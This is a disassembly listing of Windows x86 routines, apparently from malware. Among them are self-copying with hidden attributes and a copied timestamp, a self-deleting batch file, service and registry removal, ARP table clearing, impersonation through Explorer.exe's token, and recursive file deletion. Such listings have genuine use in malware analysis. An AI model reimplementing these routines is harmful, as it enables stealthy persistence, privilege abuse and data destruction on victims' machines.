; =============== S U B R O U T I N E =======================================
sub_42777F proc near ; CODE XREF: sub_40A935+47�p
; sub_41E446+F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
mov esi, offset asc_43D938 ; " "
push edi
push esi
push [esp+10h+arg_4]
call sub_429C5E
mov edi, [esp+14h+arg_0]
xor ebx, ebx
inc ebx
pop ecx
cmp [esp+10h+arg_8], ebx
pop ecx
mov [edi], eax
jle short loc_4277BA
loc_4277A2: ; CODE XREF: sub_42777F+39�j
push esi
push 0
call sub_429C5E
pop ecx
mov [edi+ebx*4], eax
test eax, eax
pop ecx
jz short loc_4277BA
inc ebx
cmp ebx, [esp+0Ch+arg_8]
jl short loc_4277A2
loc_4277BA: ; CODE XREF: sub_42777F+21�j
; sub_42777F+32�j
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_42777F endp
; =============== S U B R O U T I N E =======================================
sub_4277C0 proc near ; CODE XREF: sub_40A9FE+4BED�p
; sub_40A9FE+4CAE�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_43706C ; GetFileAttributesA
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_4277C0 endp
; =============== S U B R O U T I N E =======================================
sub_4277D5 proc near ; CODE XREF: sub_40A9FE+4CBF�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_43706C ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jnz short loc_4277E7
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4277E7: ; CODE XREF: sub_4277D5+D�j
movzx eax, al
shr eax, 4
and eax, 1
retn
sub_4277D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4277F1 proc near ; CODE XREF: sub_4278B2+EF�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
push edi
lea eax, [ebp+var_110]
push 104h
push eax
call dword_437138 ; GetWindowsDirectoryA
push 1
push offset aShell ; "Shell"
push offset aSoftwareMicr_5 ; "SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
push 80000002h
call sub_421340
xor ebx, ebx
add esp, 10h
cmp eax, ebx
jz short loc_4278AB
push eax
lea eax, [ebp+var_110]
push eax
call dword_437090 ; lstrcatA
mov esi, dword_43705C
mov edi, 80h
push ebx
push edi
push 3
push ebx
push 1
lea eax, [ebp+var_110]
push 80000000h
push eax
call esi ; dword_43705C
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz short loc_4278AB
lea ecx, [ebp+var_C]
push ecx
push ebx
push ebx
push eax
call dword_437134 ; GetFileTime
push [ebp+var_4]
call dword_437044 ; CloseHandle
push ebx
push edi
push 3
push ebx
push 2
push 40000000h
push [ebp+arg_0]
call esi ; dword_43705C
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4278AB
lea eax, [ebp+var_C]
push eax
push ebx
push ebx
push esi
call dword_437130 ; SetFileTime
push esi
call dword_437044 ; CloseHandle
xor eax, eax
inc eax
jmp short loc_4278AD
; ---------------------------------------------------------------------------
loc_4278AB: ; CODE XREF: sub_4277F1+3B�j
; sub_4277F1+71�j ...
xor eax, eax
loc_4278AD: ; CODE XREF: sub_4277F1+B8�j
pop edi
pop esi
pop ebx
leave
retn
sub_4277F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4278B2 proc near ; CODE XREF: sub_418E0F+12D�p
; sub_42245D+99�p
var_30C = byte ptr -30Ch
var_208 = byte ptr -208h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 30Ch
push ebx
push esi
mov esi, 104h
lea eax, [ebp+var_208]
push esi
xor ebx, ebx
push eax
push ebx
call dword_437070 ; GetModuleHandleA
push eax
call dword_43717C ; GetModuleFileNameA
push [ebp+arg_4]
lea eax, [ebp+var_104]
push [ebp+arg_0]
push offset dword_445D68
push esi
push eax
call sub_429BBE
add esp, 14h
lea eax, [ebp+var_208]
push eax
lea eax, [ebp+var_30C]
push eax
call dword_4370B4 ; lstrcpyA
lea eax, [ebp+var_30C]
push eax
call dword_456EAC ; PathRemoveFileSpecA
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_208]
push eax
call dword_437178 ; lstrcmpiA
test eax, eax
jz loc_4279C0
lea eax, [ebp+var_104]
push eax
call dword_43706C ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_427956
lea eax, [ebp+var_104]
push 80h
push eax
call dword_437068 ; SetFileAttributesA
loc_427956: ; CODE XREF: sub_4278B2+90�j
mov esi, dword_437064
push edi
push ebx
jmp short loc_427984
; ---------------------------------------------------------------------------
loc_427960: ; CODE XREF: sub_4278B2+E6�j
call dword_437170 ; RtlGetLastWin32Error
test ebx, ebx
jnz short loc_42799A
cmp eax, 20h
jz short loc_427974
cmp eax, 5
jnz short loc_42799A
loc_427974: ; CODE XREF: sub_4278B2+BB�j
xor ebx, ebx
push 3A98h
inc ebx
call dword_437190 ; Sleep
push 0
loc_427984: ; CODE XREF: sub_4278B2+AC�j
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_208]
push eax
call esi ; dword_437064
mov edi, eax
test edi, edi
jz short loc_427960
loc_42799A: ; CODE XREF: sub_4278B2+B6�j
; sub_4278B2+C0�j
lea eax, [ebp+var_104]
push eax
call sub_4277F1
pop ecx
lea eax, [ebp+var_104]
push 7
push eax
call dword_437068 ; SetFileAttributesA
test edi, edi
pop edi
jz short loc_4279C0
xor eax, eax
inc eax
jmp short loc_4279C2
; ---------------------------------------------------------------------------
loc_4279C0: ; CODE XREF: sub_4278B2+7A�j
; sub_4278B2+107�j
xor eax, eax
loc_4279C2: ; CODE XREF: sub_4278B2+10C�j
pop esi
pop ebx
leave
retn
sub_4278B2 endp
; =============== S U B R O U T I N E =======================================
sub_4279C6 proc near ; CODE XREF: sub_420B3B+B4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
push 40h
mov edx, offset dword_676018
pop ecx
xor eax, eax
mov edi, edx
rep stosd
mov eax, [esp+4+arg_4]
pop edi
cmp eax, [esp+arg_8]
jg short loc_4279F7
push esi
mov esi, edx
sub esi, eax
loc_4279E5: ; CODE XREF: sub_4279C6+2E�j
mov ecx, [esp+4+arg_0]
mov cl, [eax+ecx]
mov [esi+eax], cl
inc eax
cmp eax, [esp+4+arg_8]
jle short loc_4279E5
pop esi
loc_4279F7: ; CODE XREF: sub_4279C6+18�j
mov eax, edx
retn
sub_4279C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4279FA proc near ; CODE XREF: sub_40A9FE+7A6�p
; sub_40A9FE+7C3�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
xor esi, esi
cmp edi, esi
jz short loc_427A87
mov eax, [ebp+arg_4]
cmp eax, esi
jz short loc_427A87
cmp [ebp+arg_8], esi
jz short loc_427A87
cmp byte ptr [eax], 0
jz short loc_427A87
push ebx
push edi
call sub_4362D0
mov ebx, eax
pop ecx
test ebx, ebx
jz short loc_427A82
push [ebp+arg_4]
push edi
call sub_42AEA0
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_427A7B
sub eax, edi
push eax
push edi
push ebx
call sub_429D10
push [ebp+arg_8]
mov eax, ebx
sub eax, edi
and byte ptr [eax+esi], 0
call sub_4293A0
push eax
push [ebp+arg_8]
push ebx
call sub_4299E0
push [ebp+arg_4]
call sub_4293A0
add esp, 20h
add eax, esi
push eax
push ebx
call dword_437090 ; lstrcatA
push ebx
push edi
call dword_4370B4 ; lstrcpyA
mov esi, edi
loc_427A7B: ; CODE XREF: sub_4279FA+3C�j
push ebx
call sub_4298F2
pop ecx
loc_427A82: ; CODE XREF: sub_4279FA+2B�j
mov eax, esi
pop ebx
jmp short loc_427A89
; ---------------------------------------------------------------------------
loc_427A87: ; CODE XREF: sub_4279FA+C�j
; sub_4279FA+13�j ...
xor eax, eax
loc_427A89: ; CODE XREF: sub_4279FA+8B�j
pop edi
pop esi
pop ebp
retn
sub_4279FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427A8D proc near ; CODE XREF: sub_427B4E+38�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
inc dword ptr [esi]
xor ebx, ebx
jmp short loc_427ABD
; ---------------------------------------------------------------------------
loc_427AA7: ; CODE XREF: sub_427A8D+36�j
mov dl, [eax]
cmp dl, 3Fh
jz short loc_427AB8
cmp dl, 2Ah
jnz short loc_427ACA
cmp dl, 3Fh
jnz short loc_427ABB
loc_427AB8: ; CODE XREF: sub_427A8D+1F�j
inc ecx
mov [edi], ecx
loc_427ABB: ; CODE XREF: sub_427A8D+29�j
inc dword ptr [esi]
loc_427ABD: ; CODE XREF: sub_427A8D+18�j
mov ecx, [edi]
mov eax, [esi]
cmp [ecx], bl
jnz short loc_427AA7
jmp short loc_427ACA
; ---------------------------------------------------------------------------
loc_427AC7: ; CODE XREF: sub_427A8D+40�j
inc eax
mov [esi], eax
loc_427ACA: ; CODE XREF: sub_427A8D+24�j
; sub_427A8D+38�j
cmp byte ptr [eax], 2Ah
jz short loc_427AC7
mov ecx, [edi]
mov dl, [ecx]
cmp dl, bl
jnz short loc_427AEC
cmp [eax], bl
jz short loc_427ADF
xor eax, eax
jmp short loc_427B49
; ---------------------------------------------------------------------------
loc_427ADF: ; CODE XREF: sub_427A8D+4C�j
cmp dl, bl
jnz short loc_427AEC
cmp [eax], bl
jnz short loc_427AEC
xor eax, eax
inc eax
jmp short loc_427B49
; ---------------------------------------------------------------------------
loc_427AEC: ; CODE XREF: sub_427A8D+48�j
; sub_427A8D+54�j ...
push ecx
push eax
call sub_427B4E
pop ecx
test eax, eax
pop ecx
jnz short loc_427B33
loc_427AF9: ; CODE XREF: sub_427A8D+A4�j
inc dword ptr [edi]
mov eax, [edi]
jmp short loc_427B0B
; ---------------------------------------------------------------------------
loc_427AFF: ; CODE XREF: sub_427A8D+86�j
cmp cl, 5Bh
jz short loc_427B15
cmp dl, bl
jz short loc_427B15
inc eax
mov [edi], eax
loc_427B0B: ; CODE XREF: sub_427A8D+70�j
mov ecx, [esi]
mov dl, [eax]
mov cl, [ecx]
cmp cl, dl
jnz short loc_427AFF
loc_427B15: ; CODE XREF: sub_427A8D+75�j
; sub_427A8D+79�j
cmp [eax], bl
jz short loc_427B2A
push eax
push dword ptr [esi]
call sub_427B4E
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_427B2F
; ---------------------------------------------------------------------------
loc_427B2A: ; CODE XREF: sub_427A8D+8A�j
mov [ebp+var_4], ebx
xor eax, eax
loc_427B2F: ; CODE XREF: sub_427A8D+9B�j
cmp eax, ebx
jnz short loc_427AF9
loc_427B33: ; CODE XREF: sub_427A8D+6A�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_427B46
mov eax, [esi]
cmp [eax], bl
jnz short loc_427B46
mov [ebp+var_4], 1
loc_427B46: ; CODE XREF: sub_427A8D+AA�j
; sub_427A8D+B0�j
mov eax, [ebp+var_4]
loc_427B49: ; CODE XREF: sub_427A8D+50�j
; sub_427A8D+5D�j
pop edi
pop esi
pop ebx
leave
retn
sub_427A8D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427B4E proc near ; CODE XREF: sub_404525+1AF�p
; sub_404525+1CA�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor eax, eax
push esi
mov esi, [ebp+arg_0]
inc eax
jmp short loc_427B95
; ---------------------------------------------------------------------------
loc_427B5A: ; CODE XREF: sub_427B4E+4B�j
cmp eax, 1
jnz short loc_427BA3
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_427BA3
cmp cl, 2Ah
jz short loc_427B7E
cmp cl, 3Fh
jz short loc_427B79
xor eax, eax
cmp cl, dl
setz al
loc_427B79: ; CODE XREF: sub_427B4E+22�j
inc [ebp+arg_4]
jmp short loc_427B91
; ---------------------------------------------------------------------------
loc_427B7E: ; CODE XREF: sub_427B4E+1D�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_427A8D
mov esi, [ebp+arg_0]
pop ecx
pop ecx
dec esi
loc_427B91: ; CODE XREF: sub_427B4E+2E�j
inc esi
mov [ebp+arg_0], esi
loc_427B95: ; CODE XREF: sub_427B4E+A�j
mov cl, [esi]
test cl, cl
jnz short loc_427B5A
jmp short loc_427BA3
; ---------------------------------------------------------------------------
loc_427B9D: ; CODE XREF: sub_427B4E+58�j
cmp eax, 1
jnz short loc_427BBF
inc esi
loc_427BA3: ; CODE XREF: sub_427B4E+F�j
; sub_427B4E+18�j ...
cmp byte ptr [esi], 2Ah
jz short loc_427B9D
cmp eax, 1
jnz short loc_427BBF
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_427BBF
cmp byte ptr [esi], 0
jnz short loc_427BBF
xor eax, eax
inc eax
jmp short loc_427BC1
; ---------------------------------------------------------------------------
loc_427BBF: ; CODE XREF: sub_427B4E+52�j
; sub_427B4E+5D�j ...
xor eax, eax
loc_427BC1: ; CODE XREF: sub_427B4E+6F�j
pop esi
pop ebp
retn
sub_427B4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427BC4 proc near ; CODE XREF: sub_418FA1+15F�p
var_90 = byte ptr -90h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
push ebp
mov ebp, esp
sub esp, 90h
push ebx
push esi
push edi
mov edi, offset byte_445833
push 1
mov esi, offset dword_445734
push edi
push esi
push dword_445730
call sub_421340
add esp, 10h
test eax, eax
jz short loc_427BF4
push 7Fh
jmp short loc_427C66
; ---------------------------------------------------------------------------
loc_427BF4: ; CODE XREF: sub_427BC4+2A�j
lea eax, [ebp+var_10]
push eax
call dword_43713C ; GetLocalTime
mov ax, [ebp+var_8]
mov ecx, offset aPm ; "PM"
cmp ax, 0Ch
ja short loc_427C79
mov ecx, offset aAm ; "AM"
movzx eax, ax
loc_427C15: ; CODE XREF: sub_427BC4+BB�j
push ecx
mov ebx, 80h
movzx ecx, [ebp+var_6]
push ecx
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset a_2d_2d4d_2d_2d ; "%.2d/%.2d/%4d, %.2d:%.2d %s"
lea eax, [ebp+var_90]
push ebx
push eax
call sub_429BBE
lea eax, [ebp+var_90]
push 1
push eax
push edi
push esi
push dword_445730
call sub_421409
add esp, 38h
test eax, eax
jz short loc_427C74
push ebx
lea eax, [ebp+var_90]
loc_427C66: ; CODE XREF: sub_427BC4+2E�j
push eax
push offset dword_676418
call sub_429D10
add esp, 0Ch
loc_427C74: ; CODE XREF: sub_427BC4+99�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_427C79: ; CODE XREF: sub_427BC4+47�j
movzx eax, ax
sub eax, 0Ch
jmp short loc_427C15
sub_427BC4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427C81 proc near ; CODE XREF: sub_418E0F+1A�p
; sub_427DAA+9B�p
var_80C = byte ptr -80Ch
var_40C = byte ptr -40Ch
var_20C = byte ptr -20Ch
var_108 = byte ptr -108h
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 80Ch
push esi
lea eax, [ebp+var_80C]
push edi
push eax
push 400h
call dword_4370B8 ; GetTempPathA
lea eax, [ebp+var_108]
push 104h
xor esi, esi
push eax
push esi
call dword_437070 ; GetModuleHandleA
push eax
call dword_43717C ; GetModuleFileNameA
call sub_429B9C
push 9
pop edi
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429B9C
cdq
idiv edi
lea eax, [ebp+var_80C]
push edx
push offset dword_4439B4
push eax
lea eax, [ebp+var_20C]
push offset aSSIIII_bat ; "%s\\%s%i%i%i%i.bat"
push eax
call sub_429B03
add esp, 20h
lea eax, [ebp+var_108]
push 80h
push eax
call dword_437068 ; SetFileAttributesA
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_20C]
push 40000000h
push eax
call dword_43705C ; CreateFileA
mov edi, eax
cmp edi, esi
jbe short loc_427DA6
lea eax, [ebp+var_108]
cmp [ebp+arg_0], esi
push eax
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_40C]
jnz short loc_427D5E
push offset a@echoOffRepeat ; "@echo off\r\n:Repeat\r\ndel \"%s\">nul\r\nping "...
jmp short loc_427D63
; ---------------------------------------------------------------------------
loc_427D5E: ; CODE XREF: sub_427C81+D4�j
push offset a@echoOffRepe_0 ; "@echo off\r\n:Repeat\r\ndel \"%s\">nul\r\nif ex"...
loc_427D63: ; CODE XREF: sub_427C81+DB�j
push eax
call sub_429B03
add esp, 14h
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+var_40C]
push eax
call sub_4293A0
pop ecx
push eax
lea eax, [ebp+var_40C]
push eax
push edi
call dword_437078 ; WriteFile
push edi
call dword_437044 ; CloseHandle
push esi
push esi
lea eax, [ebp+var_20C]
push esi
push eax
push esi
push esi
call dword_456E74 ; ShellExecuteA
loc_427DA6: ; CODE XREF: sub_427C81+B4�j
pop edi
pop esi
leave
retn
sub_427C81 endp
; =============== S U B R O U T I N E =======================================
sub_427DAA proc near ; CODE XREF: sub_40A9FE+B1B�p
; sub_4182BA+645�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
call dword_456F28 ; OpenSCManagerA
push 0F01FFh
push offset dword_4439CC
push eax
call dword_456DC8 ; OpenServiceA
push eax
call dword_456E50 ; DeleteService
mov edi, offset byte_443B5B
mov esi, offset dword_443A5C
push edi
push esi
push dword_443A58
call sub_420F6C
push edi
push esi
push 80000001h
call sub_420F6C
add esp, 18h
cmp [esp+0Ch+arg_4], ebx
jz short loc_427E2D
push offset byte_445423
push offset dword_445324
push dword_445320
call sub_420F6C
push offset byte_445833
push offset dword_445734
push dword_445730
call sub_420F6C
add esp, 18h
loc_427E2D: ; CODE XREF: sub_427DAA+54�j
push dword_457F64
call dword_4370DC ; ReleaseMutex
cmp [esp+0Ch+arg_0], ebx
jnz short loc_427E4B
call sub_4235A4
push ebx
call sub_427C81
pop ecx
loc_427E4B: ; CODE XREF: sub_427DAA+93�j
pop edi
pop esi
pop ebx
retn
sub_427DAA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427E4F proc near ; CODE XREF: sub_41C238+C1�p
; sub_41C238+E4�p ...
var_38 = byte ptr -38h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
and [ebp+var_4], 0
push ebx
push esi
push edi
push 32h
mov edi, offset dword_675FE0
push 0
push edi
call sub_429760
mov ebx, [ebp+arg_0]
add esp, 0Ch
lea esi, [ebp+var_38]
loc_427E74: ; CODE XREF: sub_427E4F+5B�j
; sub_427E4F+61�j
push 0
push 0Ah
push [ebp+arg_4]
push ebx
call sub_42BDD0
push 0
push 0Ah
push [ebp+arg_4]
add al, 30h
mov [esi], al
inc esi
push ebx
call sub_42BE50
mov ebx, eax
or eax, edx
mov [ebp+arg_4], edx
jz short loc_427EB2
inc [ebp+var_4]
push 3
mov eax, [ebp+var_4]
pop ecx
cdq
idiv ecx
test edx, edx
jnz short loc_427E74
mov byte ptr [esi], 2Ch
inc esi
jmp short loc_427E74
; ---------------------------------------------------------------------------
loc_427EB2: ; CODE XREF: sub_427E4F+4B�j
mov eax, edi
jmp short loc_427EBB
; ---------------------------------------------------------------------------
loc_427EB6: ; CODE XREF: sub_427E4F+72�j
mov cl, [esi]
mov [eax], cl
inc eax
loc_427EBB: ; CODE XREF: sub_427E4F+65�j
dec esi
lea ecx, [ebp+var_38]
cmp esi, ecx
jnb short loc_427EB6
and byte ptr [eax], 0
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_427E4F endp
; =============== S U B R O U T I N E =======================================
sub_427ECD proc near ; CODE XREF: sub_418FA1+5C6�p
mov ecx, dword_456E14
xor eax, eax
test ecx, ecx
jz short locret_427EDB
jmp ecx
; ---------------------------------------------------------------------------
locret_427EDB: ; CODE XREF: sub_427ECD+A�j
retn
sub_427ECD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427EDC proc near ; CODE XREF: sub_40A9FE+2821�p
; sub_41EBE9+33�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
push esi
inc ebx
push edi
lea eax, [ebp+var_8]
xor edi, edi
push ebx
push eax
push edi
xor esi, esi
mov [ebp+var_8], edi
mov [ebp+var_4], ebx
call dword_456FCC ; GetIpNetTable
sub eax, edi
jz short loc_427F3B
sub eax, 32h
jz short loc_427F36
sub eax, 48h
jnz short loc_427F36
push [ebp+var_8]
call sub_4297B8
push [ebp+var_8]
mov esi, eax
push edi
push esi
call sub_429760
add esp, 10h
cmp esi, edi
jz short loc_427F36
lea eax, [ebp+var_8]
push ebx
push eax
push esi
call dword_456FCC ; GetIpNetTable
test eax, eax
jz short loc_427F3B
loc_427F36: ; CODE XREF: sub_427EDC+28�j
; sub_427EDC+2D�j ...
mov [ebp+var_4], edi
jmp short loc_427F51
; ---------------------------------------------------------------------------
loc_427F3B: ; CODE XREF: sub_427EDC+23�j
; sub_427EDC+58�j
cmp [esi], edi
jbe short loc_427F51
lea ebx, [esi+4]
loc_427F42: ; CODE XREF: sub_427EDC+73�j
push ebx
call dword_456FC8 ; DeleteIpNetEntry
inc edi
add ebx, 18h
cmp edi, [esi]
jb short loc_427F42
loc_427F51: ; CODE XREF: sub_427EDC+5D�j
; sub_427EDC+61�j
push esi
call sub_4298F2
mov eax, [ebp+var_4]
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_427EDC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427F60 proc near ; CODE XREF: sub_428017+9�p
var_110C = dword ptr -110Ch
var_10C = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov eax, 110Ch
call sub_429B60
push ebx
push esi
lea eax, [ebp+var_4]
push edi
push eax
lea eax, [ebp+var_110C]
push 1000h
push eax
call dword_456F30
test eax, eax
jz short loc_428007
mov edi, [ebp+var_4]
push 0
shr edi, 2
pop esi
jz short loc_428007
loc_427F95: ; CODE XREF: sub_427F60+A5�j
lea eax, [ebp+var_10C]
push offset aUnknown ; "unknown"
push eax
call dword_4370B4 ; lstrcpyA
push [ebp+esi*4+var_110C]
push 0
push 411h
call dword_437114 ; OpenProcess
mov ebx, eax
test ebx, ebx
jz short loc_428002
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push 4
push eax
push ebx
call dword_456EEC
test eax, eax
jz short loc_428002
lea eax, [ebp+var_10C]
push 104h
push eax
push [ebp+var_8]
push ebx
call dword_456E20
lea eax, [ebp+var_10C]
push eax
push offset aExplorer_exe ; "Explorer.exe"
call dword_437178 ; lstrcmpiA
test eax, eax
jz short loc_42800E
loc_428002: ; CODE XREF: sub_427F60+5F�j
; sub_427F60+74�j
inc esi
cmp esi, edi
jb short loc_427F95
loc_428007: ; CODE XREF: sub_427F60+28�j
; sub_427F60+33�j
xor eax, eax
loc_428009: ; CODE XREF: sub_427F60+B5�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_42800E: ; CODE XREF: sub_427F60+A0�j
mov eax, [ebp+esi*4+var_110C]
jmp short loc_428009
sub_427F60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428017 proc near ; CODE XREF: sub_40541D+C�p
; sub_423C7A:loc_423CEF�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push edi
call sub_427F60
test eax, eax
jz short loc_428067
push eax
push 1
push 1F0FFFh
call dword_437114 ; OpenProcess
mov edi, eax
test edi, edi
jz short loc_428067
lea eax, [ebp+var_4]
push esi
push eax
push 0Ah
push edi
call dword_456F18 ; OpenProcessToken
mov esi, dword_437044
test eax, eax
jz short loc_428063
push [ebp+var_4]
call dword_45700C ; ImpersonateLoggedOnUser
push [ebp+var_4]
call esi ; dword_437044
loc_428063: ; CODE XREF: sub_428017+3C�j
push edi
call esi ; dword_437044
pop esi
loc_428067: ; CODE XREF: sub_428017+10�j
; sub_428017+24�j
pop edi
leave
retn
sub_428017 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42806A proc near ; CODE XREF: sub_423C7A+18�p
var_178 = byte ptr -178h
var_16C = dword ptr -16Ch
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 178h
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_C], ebx
call dword_456F28 ; OpenSCManagerA
mov [ebp+var_4], eax
loc_42808B: ; CODE XREF: sub_42806A+7F�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_178]
push 168h
push eax
push 3
push 30h
push [ebp+var_4]
call dword_456EE0 ; EnumServicesStatusA
test eax, eax
jnz short loc_4280C1
call dword_437170 ; RtlGetLastWin32Error
cmp eax, 0EAh
jnz short loc_4280EB
loc_4280C1: ; CODE XREF: sub_42806A+48�j
xor edi, edi
cmp [ebp+var_8], ebx
jle short loc_4280E6
lea esi, [ebp+var_178]
loc_4280CE: ; CODE XREF: sub_42806A+7A�j
push [ebp+arg_0]
push dword ptr [esi]
call dword_437178 ; lstrcmpiA
test eax, eax
jz short loc_4280FB
inc edi
add esi, 24h
cmp edi, [ebp+var_8]
jl short loc_4280CE
loc_4280E6: ; CODE XREF: sub_42806A+5C�j
cmp [ebp+var_C], ebx
jnz short loc_42808B
loc_4280EB: ; CODE XREF: sub_42806A+55�j
push [ebp+var_4]
call dword_456DE4 ; CloseServiceHandle
xor eax, eax
loc_4280F6: ; CODE XREF: sub_42806A+A3�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4280FB: ; CODE XREF: sub_42806A+71�j
lea eax, [edi+edi*8]
xor ecx, ecx
cmp [ebp+eax*4+var_16C], 4
setz cl
mov eax, ecx
jmp short loc_4280F6
sub_42806A endp
; =============== S U B R O U T I N E =======================================
sub_42810F proc near ; CODE XREF: sub_40A9FE+4CD0�p
; sub_42810F+C7�p
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_114 = byte ptr -114h
arg_0 = dword ptr 4
sub esp, 144h
push ebx
mov ebx, dword_43714C
push ebp
push esi
mov esi, [esp+150h+arg_0]
push edi
push esi
call ebx ; dword_43714C
push esi
call sub_4293A0
add eax, 4
push eax
call sub_4297B8
pop ecx
mov edi, eax
pop ecx
push esi
push edi
call dword_4370B4 ; lstrcpyA
mov ebp, dword_437090
push offset a_ ; "\\*.*"
push edi
call ebp ; dword_437090
lea eax, [esp+154h+var_140]
push eax
push edi
call dword_437148 ; FindFirstFileA
mov [esp+154h+var_144], eax
loc_428162: ; CODE XREF: sub_42810F+F3�j
; sub_42810F+10F�j
cmp [esp+154h+var_144], 0FFFFFFFFh
jz loc_428227
push esi
call sub_4293A0
mov edi, eax
lea eax, [esp+158h+var_114]
push eax
call sub_4293A0
lea eax, [edi+eax+1]
push eax
call sub_4297B8
add esp, 0Ch
mov edi, eax
push esi
push edi
call dword_4370B4 ; lstrcpyA
push offset asc_44DABC ; "\\"
push edi
call ebp ; dword_437090
lea eax, [esp+154h+var_114]
push eax
push edi
call ebp ; dword_437090
lea eax, [esp+154h+var_114]
push offset dword_43AB8C
push eax
call dword_437178 ; lstrcmpiA
test eax, eax
jz short loc_42820A
lea eax, [esp+154h+var_114]
push offset a__ ; ".."
push eax
call dword_437178 ; lstrcmpiA
test eax, eax
jz short loc_42820A
test [esp+154h+var_140], 10h
jz short loc_4281DE
push edi
call sub_42810F
pop ecx
jmp short loc_4281F1
; ---------------------------------------------------------------------------
loc_4281DE: ; CODE XREF: sub_42810F+C4�j
push 80h
push edi
call dword_437068 ; SetFileAttributesA
push edi
call dword_437060 ; DeleteFileA
loc_4281F1: ; CODE XREF: sub_42810F+CD�j
lea eax, [esp+154h+var_140]
push eax
push [esp+158h+var_144]
call dword_437144 ; FindNextFileA
test eax, eax
jnz loc_428162
jmp short loc_428227
; ---------------------------------------------------------------------------
loc_42820A: ; CODE XREF: sub_42810F+A9�j
; sub_42810F+BD�j
push edi
call ebx ; dword_43714C
lea eax, [esp+154h+var_140]
push eax
push [esp+158h+var_144]
call dword_437144 ; FindNextFileA
test eax, eax
jnz loc_428162
push esi
call ebx ; dword_43714C
